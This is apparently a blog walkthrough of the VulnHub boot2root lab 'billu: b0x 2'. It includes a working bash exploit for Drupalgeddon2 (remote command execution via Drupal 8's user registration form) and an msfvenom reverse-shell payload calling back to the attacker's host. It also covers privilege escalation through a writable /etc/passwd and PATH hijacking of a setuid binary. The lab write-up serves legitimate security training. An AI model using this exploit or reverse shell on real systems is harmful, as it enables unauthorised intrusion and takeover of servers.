This post documents the complete walkthrough of billu: b0x 2, a boot2root VM created by Manish Kishan Tanwar, and hosted at VulnHub. If you are uncomfortable with spoilers, please stop reading now.

On this post

Background

Try this if you want an OSCP refresher that’s not too difficult.

Information Gathering

Let’s start with a nmap scan to establish the available services in the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.30.129 ... PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 e6:3e:0d:ca:5c:3e:57:f8:1d:e6:e6:c5:3b:b3:67:b5 (DSA) | 2048 ee:ef:3e:03:3a:24:f8:9f:35:4f:3a:9a:6f:64:a5:f5 (RSA) | 256 af:60:d8:cb:90:08:63:4b:d3:7b:04:d3:7c:db:cf:bf (ECDSA) |_ 256 c0:56:96:d2:62:52:ea:9f:7f:d8:2a:7a:6b:1b:bd:56 (ED25519) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Drupal 8 (https://www.drupal.org) | http-methods: |_ Supported Methods: GET POST HEAD OPTIONS | http-robots.txt: 22 disallowed entries (15 shown) | /core/ /profiles/ /README.txt /web.config /admin/ | /comment/reply/ /filter/tips/ /node/add/ /search/ /user/register/ | /user/password/ /user/login/ /user/logout/ /index.php/admin/ |_/index.php/comment/reply/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Home | --==[[ Billu b0x 2 - with love from indishell Lab ]]==-- 111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 42940/udp status |_ 100024 1 45103/tcp status 8080/tcp open http syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1 | http-methods: | Supported Methods: GET HEAD POST PUT DELETE OPTIONS |_ Potentially risky methods: PUT DELETE |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat 45103/tcp open status syn-ack ttl 64 1 (RPC #100024)

nmap finds a couple of open ports. Nothing unusual. Let’s take a look at the web-related ones. The metadata in the HTML source tells me I’m looking at a Drupal 8 installation.

Drupalgeddon

Suffice to say, the first thought that comes to my mind is Drupalgeddon. Since this is Drupal 8, I’ll give EDB-ID 44448 a shot. It’s a proof-of-concept code written in Python that tests for remote command execution. It writes a file and then checks for the file’s existence. In any case, it’s easy to rewrite it in bash . i.e. wrap the script around curl and re-purpose it to take in an argument—any shell command.

exploit.sh

#!/bin/bash RHOST = 192.168.30.129 URL = "http:// $RHOST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" CMD = $1 STATUS = $( curl -s \ -o /dev/null \ -w % { http_code } \ --data-urlencode "form_id=user_register_form" \ --data-urlencode "_drupal_ajax=1" \ --data-urlencode "mail[#post_render][]=exec" \ --data-urlencode "mail[#type]=markup" \ --data-urlencode "mail[#markup]= $CMD " \ $URL ) if [ $STATUS -eq 200 ] ; then echo "[+] Exploit Successful" else echo "[!] Exploit Failed" fi

Time to run my exploit script.

On my exploit script terminal

On my nc listener

You can see the remote command executed successfully.

Next, I’ll make use of wget to transfer a reverse shell (generated by msfvenom ), make it executable with chmod , and then execute it.

You can generate the reverse shell with msfvenom like so.

# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.30.128 LPORT=1234 -f elf -o rev [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 68 bytes Final size of elf file: 152 bytes Saved as: rev

On my exploit script terminal

On my SimpleHTTPServer terminal

On my nc listener

I got shell.

Privilege Escalation

Long story short. Once you have a low-privilege shell, there are two ways to gain root privileges.

Method 1: world-writable /etc/passwd

How do you know /etc/passwd is world-writable? Simple.

So what if /etc/passwd is world-writable? What can you do with it? Enough to be dangerous.

su to toor . Password is toor .

Method 2: /opt/s is setuid to root

How do you know /opt/s is setuid to root ? Simple.

Check out the strings in the executable. This is classic—hijacking the default executable search path.

scp is not specified in absolute path. We can easily trick the shell to search for a PATH we specified first. Heck, we don’t even have to compile any code. Any shell script that start with #! will suffice, as long as it’s called scp .

Afterthought

A good way to kill time.